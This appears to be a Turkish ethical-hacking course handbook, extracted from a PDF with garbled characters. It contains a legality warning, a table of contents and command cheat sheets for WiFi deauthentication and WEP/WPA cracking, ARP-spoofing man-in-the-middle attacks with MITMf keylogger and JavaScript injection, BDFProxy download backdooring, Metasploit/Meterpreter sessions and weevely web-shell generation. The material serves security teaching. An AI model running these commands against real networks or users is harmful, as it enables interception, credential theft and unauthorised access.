ATIL SAMANCIO!LU
ETIK HACKER’IN EL KITABI
UYARI! Bu el kitabında yer alan bilgiler Udemy’de yayınlanan “Etik Hacker Nasıl Olunur” kursunun destekleyici notlarıdır. Kursta Kursta da belirtildi belirtildi! !i gibi burada ö! ö!retilen tekniklerin kullanımı e! e!er izniniz yok ise yasa dı" dı"ıdır. Ö!rendi rendi! !iniz teknikleri kesinlikle kendi a! a!ınızda test ediniz ve resmi olarak sözle" sözle"meniz, anla" anla"manız olmayan hiç bir kuruma kar" kar"ı kullanmayınız. Kursu izleyen ve bu kitabı okuyan herkes yasal zeminde kalma sorumlulu! sorumlulu !unu kabul etmi" etmi"tir. Bu notlar sadece kurs alanlara hitap etmektedir etmekt edir.. Bu kitabı izinsiz payla""mak yasaktır. payla
UYARI! Bu el kitabında yer alan bilgiler Udemy’de yayınlanan “Etik Hacker Nasıl Olunur” kursunun destekleyici notlarıdır. Kursta Kursta da belirtildi belirtildi! !i gibi burada ö! ö!retilen tekniklerin kullanımı e! e!er izniniz yok ise yasa dı" dı"ıdır. Ö!rendi rendi! !iniz teknikleri kesinlikle kendi a! a!ınızda test ediniz ve resmi olarak sözle" sözle"meniz, anla" anla"manız olmayan hiç bir kuruma kar" kar"ı kullanmayınız. Kursu izleyen ve bu kitabı okuyan herkes yasal zeminde kalma sorumlulu! sorumlulu !unu kabul etmi" etmi"tir. Bu notlar sadece kurs alanlara hitap etmektedir etmekt edir.. Bu kitabı izinsiz payla""mak yasaktır. payla
!ÇERIK !
Giri"" Giri !
Ho""geldiniz Ho
!
Kursta Neler Ö! Ö!renece renece! !iz?
!
#ngilizc ngilizcee Terimler Terimler
!
Ba""lamadan Önce Ba
!ÇERIK !
Kurulum ! !
Sanal Makina Nedir? Neden Sanal Makina? Virtual Box Yüklemek
!
Kali Linux Nedir? Nasıl Yüklenir?
!
Kali Linux Ayarları
!
Windows 10 #ndirmek
!
Windows 10 Ayarları
!
Snapshot Almak
!ÇERIK !
Kali Linux !
Kali Linux Genel Görünüm
!
Linux Komutları
!
Kali $ifresini De!i"tirmek
!ÇERIK !
Internette Anonim Olmak ! ! ! ! !
A!lar Nasıl Çalı"ır? VPN & DNS DNS Ayarlarını De!i"tirmek VPN Book Kullanmak Pratik VPN Kullanımları
!ÇERIK !
Dark Web !
Dark Web Nedir?
!
Tor Browser
!
Dark Web’de Gezinmek
!ÇERIK !
A!lara Saldırmak #çin Ayarlar !
Network Penetration Nedir?
!
Wireless Kart Seçimi
!
Wireless Kartımızı Kali Linux’e Tanıtmak
!
MAC Adresi Nedir?
!
Monitor ve Managed Modlar
!ÇERIK !
A!larla #lgili Bilgi Toplamak !
A!ları #ncelemek
!
Belirli Bir A!a Özel Bilgi Edinmek
!
Yetkisizlendirme Saldırıları
!
Canlı Deauth Saldırısı
!
Sahte Modem Saldırıları
!
Mana Toolkit Kullanımı
!
Sahte #nterneti Kullanmak
!ÇERIK !
A!lara Saldırmak !
$ifreleme Modelleri
!
WEP $ifrelerini Kırmak
!
Sahte Yetkilendirme
!
Paket Yüklemek
!
WPA Nasıl Çalı"ır?
!
El Sıkı"ması Yakalamak
!
Wordlist Hazırlamak
!
Canlı WPA Kırmak
!
Daha Güvenli Bir A!
!ÇERIK !
Ba!lantı Sonrası Yapılacaklar !
Ba!lantı Sonrası Ayarlar
!
netdiscover Kullanımı
!
nmap Kullanmak
!
Ortadaki Adam (Man In The Middle)
!
ARP Saldırısı
!
MITM Framework
!
Güvenli Siteleri Kırma
!
HSTS Nedir?
!
DNS ile oynamak
!
Ekran Görüntülerini Ele Geçirmek
!
Keylogger Yüklemek
!
Javascript Kodu Çalı"tırmak
!
Wireshark Ba"langıç
!
Wireshark Analizi
!
Ortadaki Adamdan Korunmak
!ÇERIK !
Bilgisayarlara Saldırmak !
Bilgisayarı Ele Geçirmek
!
Metasploitable 2 VM Yüklemek
!
Açıklar Bulmak
!
#lk Hack’lememiz
!
Kullanıcı Adı Açı!ı Hack’lemek
!
Veritabanı Açı!ını Kullanmak
!
MSFC Yüklemek (Metasploit community)
!
Tarama Yapmak
!
Session Açmak
!ÇERIK !
Kullanıcılara Saldırmak !
Kullanıcılara Saldırmak Nedir?
!
Veil Yüklemek
!
Veil Genel Görünüm
!
Arka Kapı Yaratmak
!
Anti Virüslere Yakalanmamak
!
Multihandler Kullanımı
!
Trojanları Test Etmek
!
BDFProxy Ayarları
!
Trojan Yamamak
!ÇERIK !
Sosyal Mühendislik !
Sosyal Mühendislik Nedir?
!
Maltego Görünüm
!
Saldırı Stratejisi
!
Görsel Seçmek
!
Görsellerle Dosyayı Birle"tirmek
!
Daha #nandırıcı Bir Dosya
!
Uzantıları De!i"tirmek
!
E-mailleri De!i"tirmek
!ÇERIK !
Beef !
Beef Nedir?
!
Hedefi Oltaya Takmak
!
JS Enjeksiyonu
!
Basit Komutlar
!
Facebook, Youtube $ifrelerini Çalmak
!
Trojan Enjekte Etmek
!
Kendimizi Nasıl Koruruz?
!ÇERIK !
Dı" A!a Saldırmak !
A! Ayarları
!
Dı" A! Trojan
!
Dı" A!daki Bilgisayarı Hack’lemek
!ÇERIK !
Bilgisayarı Ele Geçirdikten Sonra !
Meterpreter Seansları
!
#"lem Göçü
!
Önemli Dosyaları Çalmak
!
Ekran Görüntüsü Almak
!
Ba!lantıyı Sürdürülebilir Hale Getirmek
!ÇERIK !
Web Sitesi Bilgi Toplamak ! !
Websitesi Hack’lemek Ayarlar Yeniden Maltego!
!
Netcraft
!
Ters IP Araması
!
Whois Sorgusu
!
Robots
!
Alt Adresler
!ÇERIK !
Web Sitesi Pentesting !
Kod Uygulama Açıkları
!
Ters TCP Komutları
!
Dosya Yükleme Açıkları
!
Dosya Barındırma Açıkları
!ÇERIK !
XSS ile Web Sitesi Hackleme !
XSS Nedir?
!
URL #le XSS
!
Kayıtlı XSS
!
XSS #le Gerçek Hacking Deneyimi
!
XSS’den Nasıl Korunurum?
!ÇERIK !
SQL Kodları !
SQL Ve Veritabanı
!
Android Studio Örne!i
!
Veritabanına Kayıt Yapmak
!
Veritabanından De!erleri Okumak
!
Verileri Silmek ve Güncellemek
!ÇERIK !
SQL A"ılama !
Metasploitable Veritabanları
!
Mutillidae Veritabanı
!
Açıkları Aramak
!
SQL Enjeksiyon POST Metodu
!
SQL Enjeksiyon GET Metodu
!
Veritabanındaki Tüm Verileri Çalmak
!
Veritabanı #simlerini Ö!renmek
!
Daha Derinlere #nmek
!
Her"eyi Ele Geçirmek
!ÇERIK !
Websitesi Pentest Araçları !
Sqlmap
!
Zap
!
Zap Analizi
NELER Ö"RENECE"IZ !
Bilgisayarı Ele Geçirmeden Önce ! !
!
!
Network Pentesting
Bilgisayarı Ele Geçirmek !
Bilgisayara Saldırmak
!
Kullanıcıya Saldırmak
Bilgisayarı Ele Geçirdikten Sonra !
!
VPN - Dark Web
Meterpreter vb. Metodlar
Websitelerine Saldırmak !
Kod Açıkları
!
SQL Enjeksiyon
!
XSS
!NGILIZCE TERIMLER ! ! !
Virtual Machine: Sanal Makina Pentesting / Penetration Testing: Gizlice Sızma Testi Vulnerability: Korunmasız / Açık Nokta
!
Exploit: Sömürmek / Faydalanmak
!
Php, python, ruby, javascript, go: Programlama dilleri
!
Network: A!
!
User: Kullanıcı
!
Server: Sunucu
!
Password: $ifre
!
Router: Modem
!
Database: Veritabanı
!
Start: Ba"latmak
!
Request: #stek
!
Stop: Durdurmak
!
Response: Cevap
!
File Name: Dosya Adı
!
Inject: A"ılama
!
Authentication: Do!rulama
!
Wordlist: Kelime listesi
VIRTUAL MACHINE
IP - DNS - VPN R E Q U E S T R E S P O N S E
192.168.0.10
ROUTER
REQUEST
192.168.0.11
RESPONSE
RESPONSE T S E U R E Q
192.168.0.12
N S E O P R E S
REQUEST
192.168.0.1 85.100.25.149
INTERNET
DARK WEB VISIBLE WEB DEEP WEB
DARK WEB TOR
FREENET
NETWORK PENETRATION !
A!a Ba!lanmadan Önce
!
A!a Ba!lanırken - Wi-fi Kırma
!
A!a Ba!landıktan Sonra
!
Güvenlik Önlemleri
MAC ADDRESS !
ifconfig
down
!
macchanger -m
!
ifconfig up
MONITOR VS MANAGED
AIRODUMP-NG !
airmon-ng start (monitor mode)
!
airodump-ng
!
control + c
AIRODUMP-NG !
!
airodump-ng —channel —bssid —write <file_name> airodump-ng —channel 12 —bssid 40:30:20:10 —write test mon0
YETKISIZLENDIRME SALDIRISI
!
aireplay-ng —deauth <#packets> -a
!
ex: aireplay-ng —deauth 1000 -a 10:20:30:40 mon0
!
!
aireplay-ng —deauth <#packets> -a - c ex: aireplay-ng —deauth 1000 -a 10:20:30:40 - c 00:AA:11:BB mon 0
SAHTE MODEM SALDIRILARI R E Q U E S T
INTERNET T S E U Q E R
R E S P O N S E
REQUEST
REQUEST
RESPONSE
HACKER WIRELESS CARD RESPONSE
T S E U R E Q
N S E O P R E S
ROUTER
R E S P O N S E
SAHTE MODEM SALDIRILARI
!
apt-get install mana-toolkit
!
leafpad /etc/mana-toolkit/hostapd-mana.conf
!
!
leafpad /usr/share/mana-toolkit/run-mana/start-natsimple.sh bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
#IFRELEME TEKNIKLERI !
WEP
!
WPA / WPA2
WEP CRACKING
!
!
airodump-ng —channel —bssid —write <file_name> ex: airodump-ng —channel 10 -bssid 10:20:30:40 -write test mon0
!
aircrack-ng <file_name>
!
ex: aircrack-ng test-01.cap
WEP CRACKING - SAHTE YETKILENDIRME !
!
aireplay-ng —fakeauth 0 -a -h ex: aireplay-ng —fakeauth 0 - a 10:20:30:40 -h 50:AA:BB: 40 mon0
WEP CRACKING - PAKET YÜKLEME !
!
aireplay-ng —arpreplay-ng -b -h aireplay-ng —arpreplay-ng - b 10:20:30:40 -h 00:aa:bb:33 mon0
WPA CRACKING !
Handhsake
!
Wordlist
WPA/WPA2
!
airodump-ng —channel —bssid —write <file_name>
!
ex: airodump-ng —channel 10 - bssid 10:20:30:40 -write test mon0
!
aireplay-ng —deauth <#packets> -a -c
!
ex: aireplay-ng —deauth 1000 - a 10:20:30:40 -c aa:bb:30:40 mon0
CRUNCH !
./ crunch -t -o file
!
ex: ./ crunch 8 10 123!’^+% -t m@@@p -file wordlist
WPA/WPA2 WORDLIST !
aircrack-ng -w
!
ex: aircrack-ng test-01.cap -w wordlist
DISCOVER !
netdiscover -i -r
!
ex: netdiscover -i wlan0 192.168.1.1/24
!
zenmap !
ping scan
!
quick scan
!
quick scan plus
PORTS Port # 20/21 22 23 25 53 67/68 69 80 110
Protocol FTP SSH Telnet SMTP DNS DHCP TFTP HTTP POP
Port # 123 137/138/139
143 161/162 179 389 443 636 989/990
Protocol NTP NetBios IMAP SNMP BGP LDAP HTTPS LDAPS FTP w SSL/TLS
MITM - ORTADAKI ADAM ROUTER
T E S U E Q R
E S N O P S E R
R E S P O N S E R E Q U E S T
HACKER
MITM - ORTADAKI ADAM ROUTER
R E S P O N S E R E Q U E S T
REQUEST RESPONSE
HACKER
MITM - ORTADAKI ADAM !
arpspoof -i -t
!
arpspoof -i -t
!
echo 1 > /proc/sys/net/ip /proc/sys/net/ipv4/ip_forward v4/ip_forward
MITMF !
!
mitmf —arp —spoof —gateway —targets -i echo 1 > /proc/sys/net/ip /proc/sys/net/ipv4/ip_forward v4/ip_forward
MITM DNS !
leafpad /etc/mitmf/mitmf.conf
!
[[[A]]] Records
!
mitmf —arp —spoof —gateway —targets -i —dns
MITM SCREEN !
!
!
mitmf —arp —spoof —gateway —targets -i —screen /var/log/mitmf/
mitmf —arp —spoof —gateway —targets -i —jskeylogger
MITM INJECT !
mitmf —arp —spoof —gateway —targets -i —inject —js-payload “”
BILGISAYARI ELE GEÇIRMEK !
Seçiminizi yapın:
!
Bilgisayarlara saldırmak
!
Kullanıcılara saldırmak
METASPLOIT !
msfconsole
!
show
!
use
!
set
!
exploit
METASPLOIT !
download Metasploit Community from web
!
cd Downloads
!
ls
!
chmod +x metasploit-latest-linux-x64-installer.run
!
./metasploit-latest-linux-x64-installer.run
!
service metasploit start
!
https://localhost:3790/
KULLANICILARA SALDIRMAK !
Trojanlar üstünden çalı"ıyoruz
!
IP belli de!ilse bunu kullanabiliriz
!
Kullanıcı ile etkile"im olması gerekebilir
!
Social Engineering
BDFPROXY !
leafpad /etc/bdfproxy/bdfproxy.cfg
!
bdfproxy
!
!
!
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080 mitmf —arp —spoof —gateway —target -i msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
OUTSIDE NETWORK !
veil: !
!
msfconsole: !
!
set LHOST
set LHOST
ipforwarding
METERPRETER !
background
!
sessions -l
!
migrate
!
sessions -i
!
sysinfo
!
ipconfig
WEEVELY !
weevely generate <file_name>
!
weevely
DATABASE & SQL
